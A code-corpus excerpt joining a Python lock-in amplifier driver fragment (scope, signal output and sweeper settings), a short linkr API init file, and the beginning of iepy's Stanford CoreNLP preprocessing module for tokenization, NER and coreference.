label='Scope trigger gating source',
set_cmd=partial(self._setter, 'scopes', 0, 0,
'triggate/inputselect'),
get_cmd=partial(self._getter, 'scopes', 0, 0,
'triggate/inputselect'),
val_mapping=triggates,
vals=vals.Enum(*list(triggates.keys()))
)
self.add_parameter('scope_trig_gating_enable',
label='Scope trigger gating ON/OFF',
set_cmd=partial(self._setter, 'scopes', 0, 0,
'triggate/enable'),
get_cmd=partial(self._getter, 'scopes', 0, 0,
'triggate/enable'),
val_mapping = {'ON': 1, 'OFF': 0},
vals=vals.Enum('ON', 'OFF'))
self.add_parameter('scope_trig_holdoffmode',
label="Scope trigger holdoff mode",
set_cmd=partial(self._setter, 'scopes', 0,
0, 'trigholdoffmode'),
get_cmd=partial(self._getter, 'scopes', 0,
0, 'trigholdoffmode'),
val_mapping={'s': 0, 'events': 1},
vals=vals.Enum('s', 'events')
)
self.add_parameter('scope_trig_holdoffseconds',
label='Scope trigger holdoff',
set_cmd=partial(self._scope_setter, 0, 1,
'trigholdoff'),
get_cmd=partial(self._getter, 'scopes', 0,
1, 'trigholdoff'),
unit='s',
vals=vals.Numbers(20e-6, 10)
)
self.add_parameter('scope_trig_reference',
label='Scope trigger reference',
set_cmd=partial(self._scope_setter, 0, 1,
'trigreference'),
get_cmd=partial(self._getter, 'scopes', 0,
1, 'trigreference'),
vals=vals.Numbers(0, 100)
)
# TODO: add validation. What's the minimal/maximal delay?
self.add_parameter('scope_trig_delay',
label='Scope trigger delay',
set_cmd=partial(self._scope_setter, 0, 1,
'trigdelay'),
get_cmd=partial(self._getter, 'scopes', 0, 1,
'trigdelay'),
unit='s')
self.add_parameter('scope_segments',
label='Enable/disable segments',
set_cmd=partial(self._scope_setter, 0, 0,
'segments/enable'),
get_cmd=partial(self._getter, 'scopes', 0,
0, 'segments/enable'),
val_mapping={'OFF': 0, 'ON': 1},
vals=vals.Enum('ON', 'OFF')
)
self.add_parameter('scope_segments_count',
label='No. of segments returned by scope',
set_cmd=partial(self._setter, 'scopes', 0, 1,
'segments/count'),
get_cmd=partial(self._getter, 'scopes', 0, 1,
'segments/count'),
vals=vals.Ints(1, 32768),
get_parser=int
)
self.add_function('scope_reset_avg',
call_cmd=partial(self.scope.set,
'scopeModule/averager/restart', 1),
)
########################################
# THE SCOPE ITSELF
self.add_parameter('Scope',
parameter_class=Scope,
)
########################################
# SYSTEM PARAMETERS
self.add_parameter('external_clock_enabled',
set_cmd=partial(self.daq.setInt,
f"/{self.device}/system/extclk"),
get_cmd=partial(self.daq.getInt,
f"/{self.device}/system/extclk"),
val_mapping=create_on_off_val_mapping(),
docstring="Set the clock source to external 10 MHz reference clock."
)
self.add_parameter('jumbo_frames_enabled',
set_cmd=partial(self.daq.setInt,
f"/{self.device}/system/jumbo"),
get_cmd=partial(self.daq.getInt,
f"/{self.device}/system/jumbo"),
val_mapping=create_on_off_val_mapping(),
docstring="Enable jumbo frames on the TCP/IP interface"
)
def snapshot_base(self, update: Optional[bool] = True,
params_to_skip_update: Optional[Sequence[str]] = None
) -> Dict[Any, Any]:
""" Override the base method to ignore 'sweeper_sweeptime' if no signals selected."""
params_to_skip = []
if not self._sweeper_signals:
params_to_skip.append('sweeper_sweeptime')
if params_to_skip_update is not None:
params_to_skip += list(params_to_skip_update)
return super().snapshot_base(update=update,
params_to_skip_update=params_to_skip)
def _setter(self, module, number, mode, setting, value):
"""
General function to set/send settings to the device.
The module (e.g demodulator, input, output,..) number is counted in a
zero indexed fashion.
Args:
module (str): The module (eg. demodulator, input, output, ..)
to set.
number (int): Module's index
mode (int): Indicating whether we are asking for an int (0) or double (1)
setting (str): The module's setting to set.
value (int/double): The value to set.
"""
setstr = f'/{self.device}/{module}/{number}/{setting}'
if mode == 0:
self.daq.setInt(setstr, value)
if mode == 1:
self.daq.setDouble(setstr, value)
def _getter(self, module: str, number: int,
mode: int, setting: str) -> Union[float, int, str, Dict[Any, Any]]:
"""
General get function for generic parameters. Note that some parameters
use more specialised setter/getters.
The module (e.g demodulator, input, output,..) number is counted in a
zero indexed fashion.
Args:
module (str): The module (eg. demodulator, input, output, ..)
we want to know the value of.
number (int): Module's index
mode (int): Indicating whether we are asking for an int or double.
0: Int, 1: double, 2: Sample
setting (str): The module's setting to set.
returns:
            inquired value
"""
querystr = f'/{self.device}/{module}/{number}/{setting}'
log.debug("getting %s", querystr)
if mode == 0:
value = self.daq.getInt(querystr)
elif mode == 1:
value = self.daq.getDouble(querystr)
elif mode == 2:
value = self.daq.getSample(querystr)
else:
raise RuntimeError("Invalid mode supplied")
# Weird exception, samplingrate returns a string
return value
def _get_demod_sample(self, number: int, demod_param: str) -> float:
log.debug("getting demod %s param %s", number, demod_param)
mode = 2
module = 'demods'
setting = 'sample'
if demod_param not in ['x', 'y', 'R', 'phi']:
raise RuntimeError("Invalid demodulator parameter")
datadict = cast(Dict[Any, Any], self._getter(module, number, mode, setting))
datadict['R'] = np.abs(datadict['x'] + 1j * datadict['y'])
datadict['phi'] = np.angle(datadict['x'] + 1j * datadict['y'], deg=True)
return datadict[demod_param]
def _sigout_setter(self, number: int,
mode: int,
setting: str,
value: Union[int, float],
output_mode: Optional[int] = None) -> None:
"""
Function to set signal output's settings. A specific setter function is
needed as parameters depend on each other and need to be checked and
updated accordingly.
Args:
number: The output channel to use. Either 1 or 2.
mode: Indicating whether we are asking for an int (0) or double (1).
setting: The module's setting to set.
value: The value to set the setting to.
output_mode: Some options may take an extra int to indicate which of the 8
demodulators this acts on
"""
# convenient reference
params = self.parameters
amp_val_dict = {'Vpk': lambda value: value,
'Vrms': lambda value: value * sqrt(2),
'dBm': lambda value: 10 ** ((value - 10) / 20)
}
def amp_valid(number, value):
ampdef_val = params[f"signal_output{number+1}_ampdef"].get()
autorange_val = params[f"signal_output{number+1}_autorange"].get()
if autorange_val == "ON":
imp50_val = params[f"signal_output{number + 1}_imp50"].get()
imp50_dic = {"OFF": 1.5, "ON": 0.75}
range_val = imp50_dic[imp50_val]
else:
so_range = params[f"signal_output{number+1}_range"].get()
range_val = round(so_range, 3)
converter = amp_val_dict[ampdef_val]
            if not -range_val < converter(value) < range_val:
                raise ValueError(
                    'Signal Output: Amplitude {} ({}) too high '
                    'for chosen range.'.format(value, converter(value)))
def offset_valid(number, value):
def validate_against_individual(value, amp_val, range_val):
amp_val = round(amp_val, 3)
                if not -range_val < value + amp_val < range_val:
raise ValueError('Signal Output: Offset too high for '
'chosen range.')
range_val = params[f"signal_output{number+1}_range"].get()
range_val = round(range_val, 3)
if 'MF' in self.props['options']:
for i in range(1, 9):
amp_val = params[f"signal_output{number + 1}_amplitude{i}"].get()
validate_against_individual(value, amp_val, range_val)
else:
amp_val = params[f"signal_output{number + 1}_amplitude"].get()
validate_against_individual(value, amp_val, range_val)
def range_valid(number, value):
autorange_val = params[f"signal_output{number + 1}_autorange"].get()
imp50_val = params[f"signal_output{number+1}_imp50"].get()
imp50_dic = {"OFF": [1.5, 0.15], "ON": [0.75, 0.075]}
if autorange_val == "ON":
raise ValueError('Signal Output :'
' Cannot set range as autorange is turned on.')
if value not in imp50_dic[imp50_val]:
raise ValueError('Signal Output: Choose a valid range:'
'[0.75, 0.075] if imp50 is on, [1.5, 0.15]'
' otherwise.')
def ampdef_valid(number, value):
# check which amplitude definition you can use.
# dBm is only possible with 50 Ohm imp ON
imp50_val = params[f"signal_output{number+1}_imp50"].get()
imp50_ampdef_dict = {"ON": ["Vpk", "Vrms", "dBm"], "OFF": ["Vpk", "Vrms"]}
if value not in imp50_ampdef_dict[imp50_val]:
raise ValueError("Signal Output: Choose a valid amplitude "
"definition; ['Vpk','Vrms', 'dBm'] if imp50 is"
" on, ['Vpk','Vrms'] otherwise.")
dynamic_validation = {'range': range_valid,
'ampdef': ampdef_valid,
'amplitudes': amp_valid,
'offset': offset_valid}
def update_range_offset_amp():
range_val = params[f"signal_output{number+1}_range"].get()
offset_val = params[f"signal_output{number+1}_offset"].get()
if "MF" in self.props["options"]:
amps_val = [
params[f"signal_output{number + 1}_amplitude{output}"].get()
for output in range(1, 9)
]
else:
amps_val = [params['signal_output{}_amplitude'.format(
number + 1)].get()]
for amp_val in amps_val:
                if not -range_val < offset_val + amp_val < range_val:
# The GUI would allow higher values but it would clip the signal.
raise ValueError('Signal Output: Amplitude and/or '
'offset out of range.')
def update_offset():
self.parameters[f"signal_output{number+1}_offset"].get()
def update_amp():
if "MF" in self.props["options"]:
for i in range(1, 9):
self.parameters[f"signal_output{number+1}_amplitude{i}"].get()
else:
self.parameters[f"signal_output{number + 1}_amplitude"].get()
def update_range():
self.parameters[f"signal_output{number+1}_autorange"].get()
# parameters which will potentially change other parameters
changing_param = {'imp50': [update_range_offset_amp, update_range],
'autorange': [update_range],
'range': [update_offset, update_amp],
'amplitudes': [update_range, update_amp],
'offset': [update_range]
}
setstr = f'/{self.device}/sigouts/{number}/{setting}'
if output_mode is not None:
setstr += f'/{output_mode}'
if setting in dynamic_validation:
dynamic_validation[setting](number, value)
if mode == 0:
self.daq.setInt(setstr, value)
elif mode == 1:
self.daq.setDouble(setstr, value)
else:
raise RuntimeError("Invalid mode supplied")
if setting in changing_param:
[f() for f in changing_param[setting]]
def _sigout_getter(self, number: int, mode: int, setting: str,
output_mode: Optional[int] = None) -> Union[int, float]:
"""
        Function to query the settings of signal outputs. A specific getter
        function is needed as parameters depend on each other and need to be
        checked and updated accordingly.
        Args:
            number: The output channel to use. Either 1 or 2.
mode: Indicating whether we are asking for an int (0) or double (1).
setting: The module's setting to set.
output_mode: Some options may take an extra int to indicate which
of the 8 demodulators this acts on
"""
querystr = f'/{self.device}/sigouts/{number}/{setting}'
if output_mode is not None:
querystr += f'/{output_mode}'
if mode == 0:
value = self.daq.getInt(querystr)
elif mode == 1:
value = self.daq.getDouble(querystr)
else:
raise RuntimeError("Invalid mode supplied")
return value
def _list_nodes(self, node):
"""
Returns a list with all nodes in the sub-tree below the specified node.
Args:
node (str): Module of which you want to know the parameters.
return:
list of sub-nodes
"""
node_list = self.daq.getList(f'/{self.device}/{node}/')
return node_list
@staticmethod
def NEPBW_to_timeconstant(NEPBW, order):
"""
Helper function to translate a NEP BW and a filter order
to a filter time constant. Meant to be used when calculating
sweeper sweep times.
Note: precise only to within a few percent.
Args:
NEPBW (float): The NEP bandwidth in Hz
order (int): The filter order
Returns:
float: The filter time constant in s.
"""
const = {1: 0.249, 2: 0.124, 3: 0.093, 4: 0.078, 5: 0.068,
6: 0.061, 7: 0.056, 8: 0.052}
tau_c = const[order]/NEPBW
return tau_c
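    # Worked example (illustrative, derived from the table above): a 4th-order
    # filter with a 100 Hz NEP bandwidth corresponds to a time constant of
    # roughly 0.078 / 100 = 0.78 ms.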
def _get_sweep_time(self):
"""
get_cmd for the sweeper_sweeptime parameter.
Note: this calculation is only an estimate and not precise to more
than a few percent.
Returns:
Union[float, None]: None if the bandwidthcontrol setting is
'auto' (then all bets are off), otherwise a time in seconds.
Raises:
ValueError: if no signals are added to the sweep
"""
# Possible TODO: cut down on the number of instrument
# queries.
if self._sweeper_signals == []:
raise ValueError('No signals selected! Can not find sweep time.')
mode = self.sweeper_BWmode.get()
# The effective time constant of the demodulator depends on the
# sweeper/bandwidthcontrol setting.
#
# If this setting is 'current', the largest current
# time constant of the involved demodulators is used
#
# If the setting is 'fixed', the NEP BW specified under
# sweep/bandwidth is used. The filter order is needed to convert
# the NEP BW to a time constant
demods = {sig.split('/')[3] for sig in self._sweeper_signals}
rates = []
for demod in demods:
rates.append(self._getter('demods', demod, 1, 'rate'))
rate = min(rates)
if mode == 'current':
tcs = []
for demod in demods:
tcs.append(self._getter('demods', demod, 1, 'timeconstant'))
tau_c = max(tcs)
elif mode == 'fixed':
order = self.sweeper_order()
BW = self.sweeper_BW()
tau_c = self.NEPBW_to_timeconstant(BW, order)
elif mode == 'auto':
return None
settlingtime = max(self.sweeper_settlingtc.get()*tau_c,
self.sweeper_settlingtime.get())
averagingtime = max(self.sweeper_averaging_time.get()*tau_c*rate,
self.sweeper_averaging_samples.get())/rate
time_est = (settlingtime+averagingtime)*self.sweeper_samplecount.get()
return time_est
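    # In short, the estimate above is (hedged summary of the code, not a spec):
    #   settling  = max(settling_tc * tau_c, settling_time)
    #   averaging = max(averaging_time * tau_c * rate, averaging_samples) / rate
    #   sweeptime ~ (settling + averaging) * samplecount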
def _sweep_setter(self, setting, value):
"""
set_cmd for all sweeper parameters. The value and setting are saved in
a dictionary which is read by the Sweep parameter's build_sweep method
and only then sent to the instrument.
"""
key = '/'.join(setting.split('/')[1:])
self._sweepdict[key] = value
self.sweep_correctly_built = False
def _sweep_getter(self, setting):
"""
General get_cmd for sweeper parameters
The built-in sweeper.get command returns a dictionary, but we want
single values.
Args:
setting (str): the path used by ZI to describe the setting,
e.g. 'sweep/settling/time'
"""
# TODO: Should this look up in _sweepdict rather than query the
# instrument?
returndict = self.sweeper.get(setting) # this is a dict
# The dict may have different 'depths' depending on the parameter.
# The depth is encoded in the setting string (number of '/')
keys = setting.split('/')[1:]
while keys != []:
key = keys.pop(0)
returndict = returndict[key]
rawvalue = returndict
if isinstance(rawvalue, np.ndarray) and len(rawvalue) == 1:
value = rawvalue[0]
elif isinstance(rawvalue, list) and len(rawvalue) == 1:
value = rawvalue[0]
else:
value = rawvalue
return value
def add_signal_to_sweeper(self, demodulator, attribute):
"""
Add a signal to the output of the sweeper. When the sweeper sweeps,
the signals added to the sweeper are returned.
Args:
demodulator (int): A number from 1-8 choosing the demodulator.
The same demodulator can be chosen several times for
different attributes, e.g. demod1 X, demod1 phase
attribute (str): The attribute to record, e.g. phase or Y
Raises:
ValueError: if a demodulator outside the allowed range is
selected
ValueError: if an attribute not in the list of allowed attributes
is selected
"""
# TODO: implement all possibly returned attributes
valid_attributes = ['X', 'Y', 'R', 'phase', 'Xrms', 'Yrms', 'Rrms']
# Validation
if demodulator not in range(1, 9):
raise ValueError('Can not select demodulator' +
f' {demodulator}. Only ' +
'demodulators 1-8 are available.')
if attribute not in valid_attributes:
            raise ValueError(
                f'Can not select attribute: {attribute}. Only the following '
                'attributes are available: ' + ', '.join(valid_attributes))
# internally, we use strings very similar to the ones used by the
# instrument, but with the attribute added, e.g.
# '/dev2189/demods/0/sample/X' means X of demodulator 1.
signalstring = ('/' + self.device +
'/demods/{}/sample/{}'.format(demodulator-1,
attribute))
if signalstring not in self._sweeper_signals:
self._sweeper_signals.append(signalstring)
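    # Minimal usage sketch (the instance name `zi` is chosen here purely for
    # illustration):
    #
    #   zi.add_signal_to_sweeper(1, 'R')      # record R of demodulator 1
    #   zi.add_signal_to_sweeper(1, 'phase')  # ... and its phase
    #   zi.print_sweeper_settings()           # inspect before sweeping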
def remove_signal_from_sweeper(self, demodulator, attribute):
"""
Remove a signal from the output of the sweeper. If the signal
has not previously been added, a warning is logged.
Args:
demodulator (int): A number from 1-8 choosing the demodulator.
The same demodulator can be chosen several times for
different attributes, e.g. demod1 X, demod1 phase
attribute (str): The attribute to record, e.g. phase or Y
"""
signalstring = ('/' + self.device +
'/demods/{}/sample/{}'.format(demodulator-1,
attribute))
if signalstring not in self._sweeper_signals:
log.warning(f'Can not remove signal with {attribute} of' +
f' demodulator {demodulator}, since it was' +
' not previously added.')
else:
self._sweeper_signals.remove(signalstring)
def print_sweeper_settings(self):
"""
Pretty-print the current settings of the sweeper.
If Sweep.build_sweep and Sweep.get are called, the sweep described
here will be performed.
"""
print('ACQUISITION')
toprint = ['sweeper_BWmode', 'sweeper_BW', 'sweeper_order',
'sweeper_averaging_samples', 'sweeper_averaging_time',
'sweeper_settlingtime', 'sweeper_settlingtc']
for paramname in toprint:
parameter = self.parameters[paramname]
print(' {}: {} ({})'.format(parameter.label, parameter.get(),
parameter.unit))
        print('HORIZONTAL')
toprint = ['sweeper_start', 'sweeper_stop',
'sweeper_units',
'sweeper_samplecount',
'sweeper_param', 'sweeper_mode',
'sweeper_timeout']
for paramname in toprint:
parameter = self.parameters[paramname]
print(f' {parameter.label}: {parameter.get()}')
print('VERTICAL')
count = 1
for signal in self._sweeper_signals:
(_, _, _, dm, _, attr) = signal.split('/')
fmt = (count, int(dm)+1, attr)
print(' Signal {}: Demodulator {}: {}'.format(*fmt))
count += 1
features = ['timeconstant', 'order', 'samplerate']
print('DEMODULATORS')
demods = []
for signal in self._sweeper_signals:
demods.append(int(signal.split('/')[3]))
demods = set(demods)
for dm in demods:
for feat in features:
parameter = self.parameters[f"demod{dm+1:d}_{feat}"]
fmt = (dm + 1, parameter.label, parameter.get(), parameter.unit)
print(" Demodulator {}: {}: {:.6f} ({})".format(*fmt))
print("META")
swptime = self.sweeper_sweeptime()
if swptime is not None:
print(f' Expected sweep time: {swptime:.1f} (s)')
else:
print(' Expected sweep time: N/A in auto mode')
print(' Sweep timeout: {} ({})'.format(self.sweeper_timeout.get(),
's'))
ready = self.sweep_correctly_built
print(f' Sweep built and ready to execute: {ready}')
def _scope_setter(self, scopemodule, mode, setting, value):
"""
set_cmd for all scope parameters. The value and setting are saved in
a dictionary which is read by the Scope parameter's build_scope method
and only then sent to the instrument.
Args:
scopemodule (int): Indicates whether this is a setting of the
scopeModule or not. 1: it is a scopeModule setting,
0: it is not.
mode (int): Indicates whether we are setting an int or a float.
0: int, 1: float. NOTE: Ignored if scopemodule==1.
setting (str): The setting, e.g. 'length'.
value (Union[int, float, str]): The value to set.
"""
# Because setpoints need to be built
self.scope_correctly_built = False
# Some parameters are linked to each other in specific ways
# Therefore, we need special actions for setting these parameters
SRtranslation = {'kHz': 1e3, 'MHz': 1e6, 'GHz': 1e9,
'khz': 1e3, 'Mhz': 1e6, 'Ghz': 1e9}
def setlength(value):
            # TODO: add validation. The GUI seems to correct this value
self.daq.setDouble(f'/{self.device}/scopes/0/length',
value)
SR_str = self.parameters['scope_samplingrate'].get()
(number, unit) = SR_str.split(' ')
SR = float(number)*SRtranslation[unit]
self.parameters['scope_duration'].cache.set(value/SR)
self.daq.setInt(f'/{self.device}/scopes/0/length', value)
def setduration(value):
# TODO: validation?
SR_str = self.parameters['scope_samplingrate'].get()
(number, unit) = SR_str.split(' ')
SR = float(number)*SRtranslation[unit]
N = int(np.round(value*SR))
self.parameters['scope_length'].cache.set(N)
self.parameters['scope_duration'].cache.set(value)
self.daq.setInt(f'/{self.device}/scopes/0/length', N)
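        # For instance (illustrative): at the 1.80 GHz sampling rate, a requested
        # duration of 1 us becomes N = round(1e-6 * 1.8e9) = 1800 samples.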
def setholdoffseconds(value):
self.parameters['scope_trig_holdoffmode'].set('s')
self.daq.setDouble(f'/{self.device}/scopes/0/trigholdoff',
value)
def setsamplingrate(value):
# When the sample rate is changed, the number of points of the trace
# remains unchanged and the duration changes accordingly
newSR_str = dict(zip(self._samplingrate_codes.values(),
self._samplingrate_codes.keys()))[value]
(number, unit) = newSR_str.split(' ')
newSR = float(number)*SRtranslation[unit]
oldSR_str = self.parameters['scope_samplingrate'].get()
(number, unit) = oldSR_str.split(' ')
oldSR = float(number)*SRtranslation[unit]
oldduration = self.parameters['scope_duration'].get()
newduration = oldduration*oldSR/newSR
self.parameters['scope_duration'].cache.set(newduration)
self.daq.setInt(f'/{self.device}/scopes/0/time', value)
specialcases = {'length': setlength,
'duration': setduration,
'scope_trig_holdoffseconds': setholdoffseconds,
'time': setsamplingrate}
if setting in specialcases:
specialcases[setting](value)
self.daq.sync()
return
else:
# We have two different parameter types: those under
# /scopes/0/ and those under scopeModule/
if scopemodule:
self.scope.set(f'scopeModule/{setting}', value)
elif mode == 0:
self.daq.setInt('/{}/scopes/0/{}'.format(self.device,
setting), value)
elif mode == 1:
self.daq.setDouble('/{}/scopes/0/{}'.format(self.device,
setting), value)
return
def _scope_getter(self, setting):
"""
get_cmd for scopeModule parameters
"""
# There are a few special cases
SRtranslation = {'kHz': 1e3, 'MHz': 1e6, 'GHz': 1e9,
'khz': 1e3, 'Mhz': 1e6, 'Ghz': 1e9}
def getduration():
SR_str = self.parameters['scope_samplingrate'].get()
(number, unit) = SR_str.split(' ')
SR = float(number)*SRtranslation[unit]
N = self.parameters['scope_length'].get()
duration = N/SR
return duration
specialcases = {'duration': getduration}
if setting in specialcases:
value = specialcases[setting]()
else:
querystr = 'scopeModule/' + setting
returndict = self.scope.get(querystr)
# The dict may have different 'depths' depending on the parameter.
# The depth is encoded in the setting string (number of '/')
keys = setting.split('/')
while keys != []:
key = keys.pop(0)
returndict = returndict[key]
rawvalue = returndict
if isinstance(rawvalue, np.ndarray) and len(rawvalue) == 1:
value = rawvalue[0]
elif isinstance(rawvalue, list) and len(rawvalue) == 1:
value = rawvalue[0]
else:
value = rawvalue
return value
@staticmethod
def _convert_to_float(frequency):
converter = {'hz': 'e0', 'khz': 'e3', 'mhz': 'e6', 'ghz': 'e9',
'thz': 'e12'}
value, suffix = frequency.split(' ')
return float(''.join([value, converter[suffix.lower()]]))
def round_to_nearest_sampling_frequency(self, desired_sampling_rate):
available_frequencies = [1.8e9 / 2 ** self._samplingrate_codes[freq]
for freq in self._samplingrate_codes.keys()]
nearest_frequency = min(available_frequencies, key=lambda f: abs(
math.log(desired_sampling_rate, 2) - math.log(f, 2)))
return nearest_frequency
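    # Worked example (illustrative): a requested rate of 1 MHz is closest, on a
    # log2 scale, to 1.8 GHz / 2**11 ~ 878.9 kHz, which corresponds to the
    # '880 kHz' entry of scope_samplingrate.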
def _set_samplingrate_as_float(self, frequency):
float_samplingrate_map = {1.8e9 / 2 ** v: k
for k, v in self._samplingrate_codes.items()}
frequency_as_string = float_samplingrate_map[frequency]
self.scope_samplingrate(frequency_as_string)
def _get_samplingrate_as_float(self):
frequency = self.scope_samplingrate()
correct_frequency = 1.8e9 / 2 ** self._samplingrate_codes[frequency]
return correct_frequency
def close(self):
"""
Override of the base class' close function
"""
self.scope.unsubscribe(f'/{self.device}/scopes/0/wave')
self.scope.clear()
self.sweeper.clear()
self.daq.disconnect()
super().close()
|
api/__init__.py
|
bnbwebexpertise/linkr
| 124 |
69365
|
# flake8: noqa: F401
from auth import *
from link import *
from misc import *
from user import *
|
iepy/preprocess/stanford_preprocess.py
|
francolq/iepy
| 813 |
69376
|
<reponame>francolq/iepy<gh_stars>100-1000
from collections import defaultdict
from itertools import chain, groupby
import logging
import tempfile
from iepy.preprocess import corenlp
from iepy.preprocess.pipeline import BasePreProcessStepRunner, PreProcessSteps
from iepy.preprocess.ner.base import FoundEntity
from iepy.data.models import EntityOccurrence, GazetteItem
logger = logging.getLogger(__name__)
class CoreferenceError(Exception):
pass
class GazetteManager:
_PREFIX = "__GAZETTE_"
# Stanford NER default/native classes
NATIVE_CLASSES = [
'DATE', 'DURATION', 'LOCATION', 'MISC',
'MONEY', 'NUMBER', 'ORDINAL', 'ORGANIZATION',
'PERCENT', 'PERSON', 'SET', 'TIME',
]
def __init__(self):
self.gazette_items = list(GazetteItem.objects.all())
self._cache_per_kind = defaultdict(list)
def escape_text(self, text):
text = " ".join("\Q{}\E".format(x) for x in text.split())
return text
def strip_kind(self, prefixed_kind):
return prefixed_kind.split(self._PREFIX, 1)[-1]
def was_entry_created_by_gazette(self, alias, kind):
if kind.startswith(self._PREFIX):
return True
return alias in self._cache_per_kind[kind]
def generate_stanford_gazettes_file(self):
"""
        Generates the gazettes file if there are gazette items. Returns
        the filepath if gazette items were found, else None.
        Note: the Stanford coreference annotator only handles entities of its
        native classes. That's why gazette items of such classes/kinds get some
        special management.
        As a side effect, populates the internal cache with the gazette items
        that will be passed to Stanford with any of the native classes (entity kinds).
"""
if not self.gazette_items:
return
overridable_classes = ",".join(self.NATIVE_CLASSES)
self._cache_per_kind = defaultdict(list)
gazette_format = "{}\t{}\t{}\n"
_, filepath = tempfile.mkstemp()
with open(filepath, "w") as gazette_file:
for gazette in self.gazette_items:
kname = gazette.kind.name
if kname in self.NATIVE_CLASSES:
# kind will not be escaped, but tokens will be stored on cache
self._cache_per_kind[kname].append(gazette.text)
else:
kname = "{}{}".format(self._PREFIX, kname)
text = self.escape_text(gazette.text)
line = gazette_format.format(text, kname, overridable_classes)
gazette_file.write(line)
return filepath
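    # Each non-native gazette item becomes one tab-separated line in the file
    # written above, e.g. (hypothetical kind name 'company'):
    #
    #   \QAcme\E \QCorp\E <TAB> __GAZETTE_company <TAB> DATE,DURATION,...,TIME
    #
    # i.e. the escaped text, the prefixed kind, and the comma-joined native
    # classes the entry may override.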
class StanfordPreprocess(BasePreProcessStepRunner):
def __init__(self, increment_ner=False):
super().__init__()
self.gazette_manager = GazetteManager()
gazettes_filepath = self.gazette_manager.generate_stanford_gazettes_file()
self.corenlp = corenlp.get_analizer(gazettes_filepath=gazettes_filepath)
self.override = False
self.increment_ner = increment_ner
def lemmatization_only(self, document):
""" Run only the lemmatization """
        # Lemmatization was added after the first release, so we need to support
        # documents that have every other step done but lemmatization
analysis = StanfordAnalysis(self.corenlp.analyse(document.text))
tokens = analysis.get_tokens()
if document.tokens != tokens:
raise ValueError(
"Document changed since last tokenization, "
"can't add lemmas to it"
)
document.set_lemmatization_result(analysis.get_lemmas())
document.save()
def syntactic_parsing_only(self, document):
""" Run only the syntactic parsing """
# syntactic parsing was added after the first release, so we need to
# provide the ability of doing just this on documents that
# have all the steps done but syntactic parsing
analysis = StanfordAnalysis(self.corenlp.analyse(document.text))
parse_trees = analysis.get_parse_trees()
document.set_syntactic_parsing_result(parse_trees)
document.save()
def increment_ner_only(self, document):
"""
        Runs the NER steps (basic NER and also the gazetteer), adding the newly found NEs.
"""
analysis = StanfordAnalysis(self.corenlp.analyse(document.text))
# NER
found_entities = analysis.get_found_entities(
document.human_identifier, self.gazette_manager
)
document.set_ner_result(found_entities)
# Save progress so far, next step doesn't modify `document`
document.save()
# Coreference resolution
for coref in analysis.get_coreferences():
try:
apply_coreferences(document, coref)
except CoreferenceError as e:
logger.warning(e)
def __call__(self, document):
"""Checks state of the document, and based on the preprocess options,
# decides what needs to be run, and triggers it.
"""
steps = [
PreProcessSteps.tokenization,
PreProcessSteps.sentencer,
PreProcessSteps.tagging,
PreProcessSteps.ner,
# Steps added after 0.9.1
PreProcessSteps.lemmatization,
# Steps added after 0.9.2
PreProcessSteps.syntactic_parsing,
]
steps_done = set([s for s in steps if document.was_preprocess_step_done(s)])
if self.override or not steps_done:
            # No matter what the internal state of the document is, or any other
            # option on the StanfordPreprocess, everything needs to be run
self.run_everything(document)
elif steps_done == set(steps):
# All steps are already done...
if self.increment_ner:
self.increment_ner_only(document)
else:
# Dealing with accepting "incremental-running" of preprocess for documents
# that were preprocessed with some older version of IEPY.
# "initial_steps" are the ones added up to version 0.9.1, which (at some point)
# were considered "all available steps".
initial_steps = steps[:4]
all_initials_done = set(initial_steps).issubset(steps_done)
if all_initials_done:
if PreProcessSteps.lemmatization not in steps_done:
self.lemmatization_only(document)
if PreProcessSteps.syntactic_parsing not in steps_done:
self.syntactic_parsing_only(document)
else:
# weird combination of steps done. We can't handle that right now
raise NotImplementedError(
"Running with mixed preprocess steps not supported, "
"must be 100% StanfordMultiStepRunner"
)
def run_everything(self, document):
analysis = StanfordAnalysis(self.corenlp.analyse(document.text))
# Tokenization
tokens = analysis.get_tokens()
offsets = analysis.get_token_offsets()
document.set_tokenization_result(list(zip(offsets, tokens)))
# Lemmatization
document.set_lemmatization_result(analysis.get_lemmas())
# "Sentencing" (splitting in sentences)
document.set_sentencer_result(analysis.get_sentence_boundaries())
# POS tagging
document.set_tagging_result(analysis.get_pos())
# Syntactic parsing
document.set_syntactic_parsing_result(analysis.get_parse_trees())
# NER
found_entities = analysis.get_found_entities(
document.human_identifier, self.gazette_manager
)
document.set_ner_result(found_entities)
# Save progress so far, next step doesn't modify `document`
document.save()
# Coreference resolution
for coref in analysis.get_coreferences():
try:
apply_coreferences(document, coref)
except CoreferenceError as e:
logger.warning(e)
def _dict_path(d, *steps):
"""Traverses throuth a dict of dicts.
Returns always a list. If the object to return is not a list,
it's encapsulated in one.
If any of the path steps does not exist, an empty list is returned.
"""
x = d
for key in steps:
try:
x = x[key]
except KeyError:
return []
if not isinstance(x, list):
x = [x]
return x
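# Example of the helper above (illustrative): given
#   d = {"sentences": {"sentence": [{"tokens": []}]}}
# _dict_path(d, "sentences", "sentence") returns the list [{"tokens": []}],
# while _dict_path(d, "sentences", "missing") returns [].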
class StanfordAnalysis:
"""Helper for extracting the information from stanford corenlp output"""
def __init__(self, data):
self._data = data
self.sentences = self.get_sentences()
self._raw_tokens = list(chain.from_iterable(self.sentences))
def _get(self, *args):
return _dict_path(self._data, *args)
def get_sentences(self):
result = []
raw_sentences = self._get("sentences", "sentence")
for sentence in raw_sentences:
xs = []
tokens = _dict_path(sentence, "tokens", "token")
for t in tokens:
xs.append(t)
result.append(xs)
return result
def get_sentence_boundaries(self):
"""
Returns a list with the offsets in tokens where each sentence starts, in
order. The list contains one extra element at the end containing the total
number of tokens.
"""
ys = [0]
for x in self.sentences:
y = ys[-1] + len(x)
ys.append(y)
return ys
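    # For instance (illustrative): for a document whose two sentences have 3
    # and 5 tokens, this returns [0, 3, 8]; sentence i spans tokens
    # boundaries[i]:boundaries[i + 1], and the last entry is the token count.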
def get_parse_trees(self):
result = [x["parse"] for x in self._get("sentences", "sentence")]
return result
def get_tokens(self):
return [x["word"] for x in self._raw_tokens]
def get_lemmas(self):
return [x["lemma"] for x in self._raw_tokens]
def get_token_offsets(self):
return [int(x["CharacterOffsetBegin"]) for x in self._raw_tokens]
def get_pos(self):
return [x["POS"] for x in self._raw_tokens]
def get_found_entities(self, entity_key_prefix, gazette_manager=None):
"""
Generates FoundEntity objects for the entities found.
For all the entities that came from a gazette, joins
the ones with the same kind.
"""
found_entities = []
tokens = self.get_tokens()
for i, j, kind in self.get_entity_occurrences():
alias = " ".join(tokens[i:j])
if gazette_manager is not None:
